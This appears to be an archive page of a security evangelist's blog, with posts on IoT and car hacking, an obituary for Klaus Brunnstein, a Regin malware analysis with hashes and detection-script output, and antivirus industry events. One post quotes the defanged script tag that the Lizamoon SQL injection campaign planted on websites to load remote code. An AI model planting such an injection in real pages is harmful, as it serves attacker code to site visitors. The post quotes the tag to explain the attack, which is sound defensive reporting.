| The Reference in Independent Anti-Malware Advice and Information
Subscribe | Log in


Internet of (Things) Trouble … the continuing story

Is the IoT industry making the same mistakes again?

A half year ago I wrote about the expected problems related to IoT. And guess what? Unfortunately we were right. It even became worse in the past 6 months. Nearly everything what was described back then became exploited. And that’s not a good thing.

The Car Industry

Especially all hacked cars made it into the latest newsflashes from online news media to the biggest media broadcasters in the world. Some examples were the Fiat Chrysler where 1.4 million cars were called back after the vendors Jeep hack and a Corvette where the brakes of the car could be remotely controlled. These examples confirmed the problems related to the whole car industry described in our former blog (e.g. The BMW problems).

The Fitness Industry

Completely different but fully related to the Internet of Things are the new wristbands, step counters or mobile fitness devices and the data they gather in-the-cloud and on the device and your smartphone. Interesting was the test performed by AV-Test, a worldwide well known independent test organization for security products. This test tried to measure how the private fitness data is transferred from the devices to the smartphones or the cloud and how secure the apps of fitness trackers are. You can find the full test here. These new fitness wristbands are very popular and it is already a trend; all activity results are recorded and analyzed in an app on the user’s smartphone. This means it is possible to immediately see how well the user performed. The question remains, however, is the data transported securely from the wristband to the user’s smartphone? Or is it possible for someone to intercept this link, copying or even manipulating the data? Or could the app itself be manipulated? Those questions were investigated, where 9 fitness wristbands or trackers together with the corresponding Android apps were monitored in live operation. How well performed those trackers in terms of security? And what about eavesdropping? (more…)

The AV community mourns for Klaus Brunnstein

The Viren-Test-Center’s founder passed away in May 2015, at the age of 77.

Brunnstein was born in Cologne and later on based in Hamburg. Working at the University of Hamburg, he influenced the computer science education worldwide. He will for sure be remembered by many colleagues, family and friends.

Picture of Klaus Brunnstein (*25.5.1937 - +19.05.2015)

A man we all will miss!

Klaus was one of the founders of CARO (the Computer Anti-Virus Research Organization), an organization that was established in 1990 to research and study malware. CARO was planning to create another official and public organization called EICAR, an organization aiming at antivirus research and improving development of security software. It was during the inaugural meeting of EICAR in Brussels, Belgium in 1991 that I’ve met Klaus for the first time.

While talking to Klaus, I got to learn about so many new aspects of viruses and that made me being even more interested in this whole matter. Some of his ideas were very controversial while some others, on the contrary, were even very conservative. His ideas inspired me in a lot of security related topics, events and publications I touched, visited and launched afterwards. At least you could say that, without Klaus and my first encounter with a Trojan horse, back in 1989, I wouldn’t have been into the security industry at all.

I still remember Klaus from his interesting discussions and points of view on a closed security forum. Actually, I still have all of his feedback in my backup system. Some of these old mails range back 19 years! I always stayed in contact with Klaus and I have met him during many security related events like the early EICAR conferences in the nineties.

During one of the latest CARO workshops, I told him about a book that I was writing and he told me that he always would be there in case I needed some advice. For that reason, I asked him, several months ago, to write an opinion chapter about the future of security for my book, called “Cyber Danger” (the German version “Cybergefahr” will be published later this year). I now do realize, that this will most probably be the last words he officially wrote in a book. Klaus will always be remembered as a pioneer. I am greatly saddened to have learned of his death yesterday. He contributed so much to the industry.

Klaus, I still owe you a copy of my book! Somewhere. Sometime.

Regin, an old but sophisticated cyber espionage toolkit platform

Malware can be named in one breath with Stuxnet & Co.

Regin is one of the latest cyber espionage toolkits targeting a range or organizations, companies and individuals around the world. This malware is very sophisticated and it can mentioned in the same breath with other cyberespionage campaigns like Duqu, Stuxnet, Flame, Uroburos (aka Snake/Turla). First reported about by Symantec[1], Regin kept itself under the radar for years.

As G DATA experts worked on this rootkit for quite a while we also gathered some data. The first Regin version we identified was used in March 2009 and the compilation date is July 2008:

paul@gdata:~/regin$ ./ b12c7d57507286bbbe36d7acf9b34c22c96606ffd904e3c23008399a4a50c047
File:    b12c7d57507286bbbe36d7acf9b34c22c96606ffd904e3c23008399a4a50c047
Size:    12608 bytes
Type:    PE32 executable (native) Intel 80386, for MS Windows
MD5:     ffb0b9b5b610191051a7bdf0806e1e47
SHA1:    75a9af1e34dc0bb2f7fcde9d56b2503072ac35dd
Date:    0x486CBA19 [Thu Jul  3 11:38:01 2008 UTC]
EP:      0x103d4 .text 0/4

Some sources go even back to 2003 but this in unclear at this moment however we can confirm that this campaign appeared at least early 2009.

An Open Source detection tool provided by G DATA

We identified the use of an encrypted virtual file system. In the version mentioned above, the file system is a fake .evt file in %System%\config. The header of the virtual file system is always the same:

typedef struct _HEADER {
uint16_t SectorSize;
uint16_t MaxSectorCount;
uint16_t MaxFileCount;
uint8_t FileTagLength;
uint16_t crc32custom;

During our analysis, the checksum was a CRC32. A generic approach to detect the infection could be a detection of the existence of a virtual file system on the infected system by checking the custom CRC32 value at the beginning of the file system.
Download the python script by going to the original G DATA article (link see below). SHA256: 98ac51088b7d8e3c3bb8fbca112290279a4d226b3609a583a735ecdbcd0d7045 MD5: 743c7e4c6577df3d7e4391f1f5af4d65

And here is the output when a virtual file system is scanned:
paul@gdata:~regin$ ./ security.evt
SectorSize:  1000
MaxSectorCount:  0500
MaxFileCount:  0500
FileTagLength:  10
CRC32custom:  df979328
CRC of the file: df979328
Regin detected


So far, victims of Regin were identified in 14 countries:

  • Algeria
  • Afghanistan
  • Belgium
  • Brazil
  • Fiji
  • Germany
  • Iran
  • India
  • Indonesia
  • Kiribati
  • Malaysia
  • Pakistan
  • Russia
  • Syria

Perhaps one of the most publicly known victims of Regin is Jean Jacques Quisquater, a well-known Belgian cryptographer. Kaspersky Lab stated this in their report which you can find at .

Even more interesting is the fact that Regin seems to be the spyware behind the Belgacom case, a big Belgian Telecom provider hacked in 2013. Belgacom acknowledged the hack, but never provided details about the breach. Ronald Prins from Fox-IT, which helped with the forensics and investigation of the Belgacom case, confirmed on his Twitter page that Regin could possibly be the malware behind the Belgacom case.

The Intercept, a publication of First Look Media, not only connects Regin to Belgacom, but also names the European Union as potential victim in an article published on November 24th.

The evolution of anti-virus solutions continues – Antivirus is not dead!

Anti-virus has evolved for the last 25 years and will continue to do so for the next 25 years

“Anti-virus is dead” – again. AV has been dying for the last decades. 15 years ago Dr. Alan Solomon, a highly respected security expert and founder of a pioneering anti-virus software company, made the same statement. AV also deceased when the first behavior-based products entered the market. Whenever there are new threats, the failure of AV products is pointed out and their critical illness is claimed. But – surprise, surprise – AV is still there!

Actually, this is exactly what Alan Solomon wanted to point out: AV is and always will be in an evolving state. He showed that the future of anti-virus programs would evolve, from pure signature-based detection to different kinds of technologies like heuristics and behavioral detection and even to more advanced protection methods. And now, with targeted attacks (aka APTs) and nation-state spying as new players in the threat landscape, AV is making another step in its evolution.

AV solutions are an important layer in the defense for enterprises

So what is it about this time? A couple of days ago, it was Brian Dye, Senior Vice President of Information Security at Symantec, who has claimed that anti-virus is dead, during an interview with The Wall Street Journal. Unfortunately though, the headline “AV is dead” has the potential to be misinterpreted by a wide audience, if it is put in another context.
The statement was part of a description of Symantec’s product strategy for business customers. It is nothing new that AV-solutions are a baseline protection against common threats. They are established and therefore only play a minor role when it comes to outlining the strategic aspects of upcoming security solutions for dedicated attacks. And in the complex environment of a company network, a wide range of special protections are at charge. But Dye’s statement never meant to say that AV products are useless. He just said that it needs more than an AV product to protect a company’s IT infrastructure. And this is undoubtedly true. (more…)

IoT: The Internet of Things… ehm… Trouble?!

A balancing act between usability and security

It is 20 years ago that I first included a slide in my presentation about sending spam via a refrigerator. At the time, most people found that ridiculous. Yet last year, it became a reality. Refrigerators have now become ‘smart’ and can do a whole lot more than just keep things cool.

The Internet of Things (IoT) gives everything an IP address so that everything can communicate with more or less anything and anyone else. The benefits and possibilities are almost infinite. But aren’t these technological developments evolving rapidly, maybe too rapidly? Smart TVs, gaming consoles, tablets, smartphones and cars can eavesdrop on us. Cameras in your laptop, smartphone and smart TV can watch us when we don’t want them to. Samsung is amending its user agreements to reassure people about the voice control on its smart TVs. BMW is rolling out a software update for the ConnectedDrive system in 2.2 million cars to prevent hackers easily being able to open the doors of the cars. These are the first signs that possibly too much has been started without reflection.


25 years with or within the Antivirus and Security Industry

Last week (9 December 2014) it was exactly 25 years ago one of my former managers gave me a diskette which appeared to be having the AIDS information trojan. At that time I was one of the first in the world to get a detection for it and who could reverse the situation from a trojanised machine back to healthy one. It changed my life completely. 2 years later I was one of the founders of EICAR. After that my whole life was dedicated to malware and security and I finally became what I always wanted to be: a Security Evangelist, actually a Cybersecurity Expert with deep knowledge of security and excellent skills to communicate technical stuff to non-technical people. If you want to refresh your memory about the AIDS Trojan you can watch my first TV interview (Dutch – VTM) from 9 December 1989 and find out that I changed a little bit.

I love what I’m doing. It’s my life and I’m one of the few which are not doing it only for the money. During those 25 years I’ve met a lot of interesting, brilliant minded and enthusiast people. The AV industry itself is also quite special and I still like to work with or inside this industry even after 30 years IT experience (not counting my university and school years). However some people involved are not always what they pretend to be and just do their job. It’s just a job for them.
It’s not a job for me, it’s much more, It’s my life.

And take it from me, there is a big difference if you’re driven by a mentality or principle to help the general public, companies and organizations in the continuous battle against cybercrime today.

I am ready for the next 25 years .. well that’s maybe a little bit exagerated.   ;-)

PS: If you find less blogs from me these days over here just visit the blog page of G DATA or follow my Twitterfeed @EddyWillems or watch the media in your country.

Book Launch ‘Cybergevaar’

IT security Information for everybody

I finally did it. In the beginning of October 2013, I and the Belgian publisher Lannoo ( ) officially launched ‘Cybergevaar’ in Belgium and the Netherlands. It was not an easy job, I can tell you but I always wanted to do this. It took me about 8 to 9 months to write and finalize it. That’s also part of the reason why I didn’t blog that often anymore during that period.

“Writing a book about cyber threats in a comprehensible and comprehensive way is not an easy task, but the book ‘Cybergevaar ‘ succeeds in this”, certifies the book’s first review, conducted by a well-known Belgian IT magazine, Datanews. The book “Cybergevaar” tries to provide a very readable and very accessible overview of almost every information security related problem and malware. It reaches out to the general audience and does not only target the technically savvy reader but provides information for everybody.


“Cybergevaar” starts with an overview of the history of malware and looks into the many profiles of malware writers and hackers. One of the chapters touches the topic underground economy and is using a lot of examples to explain the involvements. It is based on a whitepaper written by G Data SecurityLabs. Furthermore, new developments in the fields of cyber attacks, sabotage and espionage are discussed and looked into from different angles. The daily threats and the myths about malware are described in a detailed way. Among this, the chapter about general security tips and tricks is interesting for everybody. The book also provides a special chapter with thorough advice for companies.

While exploring the book, the reader can find several exciting security anecdotes and entertaining situations one possibly has never heard of before. Additional clarifications are provided throughout the entire book by use of attractive illustrations and easy-to-understand graphs. High-level opinions of people with experience and interest in the ICT security industry are included: Professionals such as Natalya Kasperskaya (InfoWatch), Ralf Benzmüller (G Data), Peter Kruse (CSIS Security Group), Bob Burls (Independent IT Security Consultant) are amongst the contributors.  The book also seeks to elaborate on how governments and the media can play a role in the ‘education’ of users. Moreover, it gives an inside look into the computer security industry and organizations like AMTSO and EICAR. And, of course, ‘Cybergevaar’ does not miss the opportunity to highlight how the problem and its solutions may develop in the future, with a special chapter in the form of a short story – ‘Radical Ransom’ – set in the year 2033.

“Cybergevaar” by Eddy Willems, Lannoo, 213 pages, is now available in Belgian and Dutch bookstores and online shops.  Plans to publish this book in other languages, such as German and English, are currently being discussed.

Official Website (Dutch): and

You can also order your version of the book via this webpage:


Cold Cyber War

About the abuse of sensational catchwords

The last few months there has been an astounding increase in media attention around the theme ‘cyber war’. From blogs via newspapers on to TV, everywhere we can hear statements about how a cyber war is on the verge of breaking out. But is that true?

When I think of the word ‘war’, I think of a situation where two or more sides attack one another. And the attacks lead to casualties. This should also be the case in a so called cyber war. And something like that, has not yet been seen. And quite frankly, I don’t think we will see one materializing soon.


Happy New malware Year

A turbulent beginning of 2013

Every holiday season, almost nothing feels better than giving someone you care about the one gift he or she truly wanted. We all are more than happy to enjoy a couple of days off but it seems as if the bad guys were using these days to dig up exploit possibilities and other bugs inside the software we use and to presented the world with their ‘special’ New Year gifts. Let us have a look at how the year started and sum up a couple of threats we saw during the past weeks.

We can determine threats on two major fronts: Ruby on Rails, Java and Microsoft’s Internet Explorer form the first one – all web-related. And then there are flaws in Foxit Reader and Microsoft’s Windows RT, which also got in the line of fire.


Make updates! Restart your computer!

Pornography alarm or reboot?

After years of insisting on the importance of updating and patching, most people know by now that it is wise to perform updates. Unfortunately, many people tend to think about the operating system updates only. They neglect so-called third party software, such as Adobe PDF, Adobe Flash and Oracle Java in particular and all other software in general, which is a huge mistake.

But there is another pitfall: Most computer users do not realize that many software updates do not only need to be installed, but the computer needs to be restarted for the updates and patches to take effect. The combination of ignorance, impatience and laziness is fatal in this sense.

The safety of the PC stands and falls with the combination of your security software, the updates of the OS and other software and especially of your own behavior. Very often, the Achilles heel of PC security is human ‘procrastination’.
Users often don’t want to turn the PC or laptop off completely, because the startup takes too long. The endlessly used method to simply closing the laptop or choosing hibernation state of the PC is a phenomenon that most readers will be familiar with. The use of tablet computers even made it worse: those devices are ready to be used in an instant and therefore have made us even more impatient.

Windows 8: Malware-free?

We always loved Microsoft’s operating systems as most of them are adopted very well in the whole world and security has been improving since years. The new incarnation of Windows 8 is somewhat different to the former ones as the interface underwent some notably big changes.

Windows 8 offers the same interface on many devices: Xbox, via desktop to tablet PCs and smart phones. Microsoft tries to make a user experience that is almost universal. Nevertheless, it appears that the app functionalities under Windows RT (the one for ARM tablets) and the program of the desktop version are not always the same.

You might think that having a very similar interface on the different devices enables you to do the same things on different hardware, but that doesn’t seem to be true in all the cases. Sometimes, the decision to change the user experience and the usability is a matter of security, and that is to be welcomed, but all in all, it creates confusion for the user.
A good example is Skype, from Microsoft. You can use it on any Windows device, but it is impossible to send over files under Windows RT – most possibly because of the security restrictions, due to the sandboxing approach. That is an ambiguous feature, from a user’s point of view. And that’s not the only critical view we have.


The AVAR conference 2012 in Hangzhou, China

IT security specialists discuss and shape their industry’s future

This week, the AVAR Conference is taking place in Hangzhou, China. G Data is attending the conference to participate in many of the organized events. Several pre-meetings, like the AVPD (Anti-Virus Product Developer) and the WildList meeting, already took place. All discussions and efforts will finally result in improvements for future products, for security tests and overall better security for the users.)


This year’s AVAR Conference is covering a lot of trending topics ranging from mobile malware to botnets. Seji Murakami, Chairman of AVAR, traditionally opened the conference with a warm welcome speech. This year, the keynote speeches were focused on Android security product testing (AV-Test), preventive actions concerning malware in China (CERT China) and malware trends (Microsoft).

IT security specialists now gathered for the 15th edition of the conference and it always tried to highlight the specific problems related to Asian malware. One of the main topics over here is “working all together against cybercrime” which is, unfortunately, not always an easy thing to do.

If you are interested in the agenda and information about the other topics discussed, you can find a lot of information on the AVAR Conference 2012 website. Furthermore, more info about the next conference’s venue and future topics will also follow on the official AVAR homepage.

This article can be found also on the G Data Blog.

The lack of basic security and good consultancy in a world dominated by an economical crisis

Why basic antivirus is not failing.

 A lot has been written and said about antivirus products seemingly failing these days to protect users against advanced persistent threats or specific targeted attacks. The anti-virus industry seems not to be able to detect threats like Stuxnet, Duqu, Flame or even recently Dorifel in time. Media and press called some of those attacks acts of cyberwarfare. Richard A. Clarke, an internationally-recognized expert on security, defines cyberwarfare as “actions by a nation-state to penetrate another nation’s computers or networks for the purposes of causing damage or disruption.” But there are loads of other definitions. However, it is clear that cyberwarfare consists of many different threats ranging from sabotage to espionage and national security breaches to attacks related to the critical infrastructure of a region or country. The malware used is most likely developed at least by an organization with a lot of money and is related to the first signs of what could be called cyberwarfare.

So, several companies and the general public were claiming that we all were too late in stopping these threats. Looking at the case of Flame the AV industry found out that we already had some samples of it when the news became public, but we were not aware of it. The samples have never been verified as being malicious before. Also Stuxnet went undetected for over a year after it was found.

So, the question might be the following: Is the anti-virus industry ready for the next battle? Can we all, with our tight consumer antivirus industry related budgets, be up against targeted malware or APT’s created by organizations with a lot of money?


This website is 17 years old!

Back in 1995 at the end of August I started this website as one of the first anti-virus and security sites in the world.  Today I nearly forgot this anniversary. The reason for this is that the speed of news and amounts of malware related problems has been growing like hell. The amounts of data and malware we see these days are excessive. I am personally involved with all this stuff much more (24/24  7 days a week) these days compared to 1989 when it all started for me.  The hacks we see these days are worrying. The mentality of people seems to be changed dramatically and hacking (read ‘cracking’) seems to be as normal as having dinner these days. Cyberwarfare, cybersabotage and cyberespionage are now also part of the problem. I wish I could say over 17 years: ‘Yes we’ve done it, we (the AV and security industry) solved the malware problem’ but I’m now sure that this is probably wishful thinking and never will be the case. However this battle isn’t over yet. Malware writers, hackers and other cybercriminals be prepared that also the laws are changing, maybe you could start thinking about finally turning you’re skills into the good direction. I hope nations will think twice when writing nation-state driven malware or even thinking of hacking back the hackers. An eye for an eye makes the whole world blind (Mahatma Gandhi).


Three importants AV industry events in a row

The month May has always been dedicated to several traditionally important security industry events of the year. G Data is always present at these events and was playing a very important role this time.

While the EICAR conference 2011 was dominated by the buzzword cyberwar, the 2012 EICAR conference, actually the 21st, was focusing on ‘Cyber Attacks – Myths and Reality in Contemporary Context’. The conference took place at the Marriott Hotel in Lisbon.
The recent past brought a considerable shift in the underground malware authors’ mentality; a swing from the thrill-seeking geek striving for flame or glory to the professional culprit methodologies and, even more importantly, the inadequate expertise of the average user, for monetary gain. The next contemporary threat scenario calls for an adaptation of the technology and the defense methodologies. Even if scientific research would provide the baseline for some innovations, we still need to have a more holistic approach on the implementation of new innovations. This conference therefore invited researchers to address some of these issues in their papers.
This year’s event was another great one and we are already looking forward to the next one, including some new initiatives from EICAR which should appear soon on the EICAR’s website. If things turn out as planned, the EICAR 2013 conference will be held in Cologne, Germany, 9-11 June 2013.  (more…)

Several important events in one month

4 fruitful meetings and thriving events: G Data at AMTSO, RSA , CeBIT and Infosecurity Belgium

The end of February and March have always been dedicated to several traditionally important security industry events of the year. This year, it started with an AMTSO Meeting and was followed by the RSA conference, the biggest IT security conference in the US, in the beautiful city of San Francisco.  CeBIT, is still one of the most important events in the world for the digital industry, held in Hannover, Germany. The RSA conference and CeBIT traditionally have a lot of other, minor security related meetings where we also participated in.


The good and the bad about AV multi scanner services

Online AV multi scanners are used quite often these days. However, not every user is aware of these sites and what their possibilities and limits are. Using the public online multi scanner services can be useful, but the analysis results don’t allow straightforward conclusions.

It is common for malware samples to remain undetectable for hours or even days. G Data has got comprehensive and fast detection rates for malware through our cloud technology. But still, some users might want to know more about a particular suspicious file or even analyze it themselves.
One of the easiest ways to accumulate a minimum of the desired information is provided by using online AV multi scanners. There is an interesting concept behind that: when you found a suspicious file on your pc, you can easily upload it to the service and have an immediate result as the file itself will be scanned with various up to date virus scan engines. This principle has been around for years now and gives you some immediate insight into a suspicious file. And there are indeed several of these scan service sites around. The most popular possibly is VirusTotal but you have several other ones like Jotti, NoVirusThanks, Metascan or Virscan, to name only some of them.

How does it work?
Let’s have a look at one of the most popular services, VirusTotal. You can submit your sample on a website but you could also use an email submission feature – whatever suits your needs. Online, you can even use some hash value searching, meaning that you can search their existing database of scanned files based on a sha1, sha256 or md5 hash. This feature is handy if you don’t have an actual file but know the hash value of it.


Bug bounty initiatives: a summer approach against cyberthreats?

(This blog article has been published at the G Data Security Blog over here.)

The summer season has always been a mixture of holidays and launching new intiatives against cyberthreats if you look back at the past months. One of the new initiatives is brought to us by Microsoft with what they call the Blue Hat Prize. It is a contest that wants to generate new defensive approaches in the field of computer security. By launching this initiative, MS wants to develop new solutions to resolve security threats. And there are interesting prizes for the participants, ranging from $10,000 to $200,000.
It is known that MS also has some internal research conferences, but this new program will focus on new technology and defense against memory safety vulnerabilities especially. Microsoft clearly wants to encourage researchers to think about new ways of defeating entire classes of bugs instead of MS paying for individual bugs only, like some other companies are doing.


Mobile and in-the-cloud OSes: Moving to the cloud, moving to different threats?

Lots of companies and home users “have their head in the clouds” moving their services, servers and data to the cloud without realizing they are using the cloud since a decade already and they have never given any thought about security of using services from the cloud. Even now, with financial incentives, they do not consider or look at the security implications at all.

Where does a network stop these days? Where does the business network stop? This is not easily definable anymore. Today, networks lacks clear crisp boundaries and it becomes more and more difficult to define what the real inside and outside of the corporate network is. It even becomes more and more difficult for normal users to protect themselves and to detect the real risks behind every part of the network.


Mobile Payments, DroidDream and a Reactive Policy Add up to Major Headaches

Malware writers are entrepreneurs who are always looking for the best return on investment. The Android operating system, combined with the Google Wallet Service, will offer a record-setting ROI if current policies continue. Let’s look at why.

According to Gartner and IDC, Android is the market leader in mobile operating systems, so it is logical that cyber criminals will target the platform. Android malware can easily be spread through apps, which makes it an attractive target. Not only did the beginning of 2011 see the emergence of this trend, but soon Android will take the lead as the most targeted mobile operating systems in terms of malware.

A lot of problems result from the fact that apps can be distributed via different online shops and channels. And nobody, except for security experts, is looking for malware inside the apps.

The first proof of the official Android Market being interesting for cybercriminals was reported in March 2011, called DroidDream, a family of malware which uses a pair of exploits to gain root access on vulnerable Android devices. A large number of Android applications was reported to be infected and all were pulled from the Android Market after it was reported to Google. All of the applications were versions of legitimate programs that were Trojan-ised and rebuilt by the malware authors, loaded with malicious code. DroidDream sends a collection of information like IMEI, IMSI, OS version, etc. to the attacker and then attempts to download additional software and payloads.


AMTSO, CARO and EICAR – conferences and events – an overview

The beginning of May was dedicated to three traditionally important security industry events of the year. It started with an AMTSO Meeting, then the CARO Workshop followed and it ended with the EICAR Conference. I participated for G Data in all of them!

You can find the original posting of this article at the G Data Security blog.

G Data is one of the members of AMTSO (, an organization currently comprised of around 40 members, representing testers, vendors, academics and publishers involved in anti-malware research. I was at the last AMTSO members’ meeting which was held in Prague. As always, a lot of work was done during the workshops: The document “AMTSO Guidelines on Facilitating Testability” was initiated at the suggestion of testers and developed jointly by testers and vendors. The new paper is the latest in a succession of guidelines and best practice documents already published. The AMTSO members also agreed to expand the range of documentation the organization produces to include more educational material. They also introduced changes to the voting procedure to ensure that documents cannot be approved by the members unless a majority of testers agree that the content is up to standard. This step mentioned last is designed to avoid any possibility of bias in favor of any group within the organization.


The Rise of the Targattacks*: Cyber espionage and sabotage: the new way

*Abbr.: targeted attacks

During the last 18 months we saw a growing number of targeted attacks against numerous companies and organizations. Let’s briefly have a look at some of them:

  • The Aurora Attack: an attack that began in mid 2009 and continued until December 2009. The primary goal of this attack was to gain access to high tech, security and defense companies and potentially modify source code repositories. For example at Adobe, Juniper, Google, Yahoo, etc…
  • German Emissions Trading Authority (DEHSt): suffered from phishing attacks carried out in January 2010. Scamsters circulated their fraudulent emails masquerading as email from the DEHSt and persuaded the recipients to login to a counterfeit website, ironically to protect themselves against alleged hacker attacks. Using the stolen access data, the attackers transferred emissions permits, primarily to Denmark and Great Britain, and in so doing allegedly gained up to three million Euros illegally. It is readily apparent that targeted phishing attacks can be very lucrative.
  • Stuxnet: a Windows computer worm discovered in July 2010 that targets industrial SCADA  software and equipment with the aim of attacking an Iranian nuclear plant. The attack seems to have been successful as the enrichment of Uranium was heavily delayed.
  • G20 Files attack: was announced in March 2011 but had already been going on for several months. The G20 is made up of the finance ministers and central bank governors of 19 countries and discusses key issues of the global economy. Over 150 ministry computers of the G20 were attacked. The attacks aimed at files related to the G20 meetings.
  • RSA breach: RSA is a well known security company specialized in identity and access solutions. Hackers may have gained access to part of the code generation algorithm used in RSA SecurID tokens. At least some information was extracted but it’s still unsure if it will actually cause future problems.
  • EU Commission Summit attack: this was a targeted attack against some specific servers at the EU Commission in Brussels, found and stopped before the EU March 2011 Summit. As not much is known about it, we suppose that nothing important has been leaked.
  • Epsilon email breach: Epsilon is a well known online marketing company that is working with hundreds of large companies around the world and stores millions of email addresses in its databases. Hackers have stolen customer email addresses and names belonging to a “subset of its clients”. Some big companies such as Disney, Citibank, Verizon, etc … were involved.

 And this list is still not complete.


It never stays quiet on the internet: The Lizamoon attack, the update problem?

It never stays quiet on the internet and new attacks or malware are seen every day. The last week however we saw an interesting mass SQL injection attack, referred to as Lizamoon, which was spreading and has infected several millions of URLs last week (March 29 until April 4). Even after a week, thousands of comprised websites don’t seem to be cleaned up, yet.

What are we talking about?
The mentioned attack uses SQL injection techniques to insert rogue code into the databases of websites. SQL injection is a code injection technique that misuses available functionality that is not filtered away properly. In other words: The vulnerability is present when user input is not correctly filtered for escape characters embedded in SQL statements or if the input is not strongly typed and by this unexpectedly executed (cf.: Wikipedia).

The following code was injected into a large number of websites:
<script src=hxxp://lizamoon . com / ur . php >


CeBIT 2011 and G Data

CeBIT starts on March 1st in Hannover, showcasing the latest developments in the IT industry. G Data is using the largest IT trade show in the world this year to launch the next generation of security for businesses and home users. G Data presents this year’s trade fair highlight: Generation 11 of its network solutions, equipped with a powerful backup module in all Enterprise versions. Also being revealed is G Data MobileSecurity, a security solution for Android phones. Mobile phone owners will thus be able to effectively secure their mobiles against malware. Another first that will be announced in Hannover is G Data CloudSecurity. This free browser plug-in blocks infected websites,making surfing the internet more secure. Besides presenting these innovations, the provider from Bochum, Germany is also offering a comprehensive programme in the G Data Arena, Hall 11, Booth D35.

I personally will take part in the Global Conferences during a panel session about the importance of security which is detailed below. It’s an interesting line up of experienced speakers, CEO’s or VP’s which will be sitting next to me. I will be available for interviews and chats the whole week (minus Saturday) at our booth. By the way I like my new title: Global Security Officer.   ;-)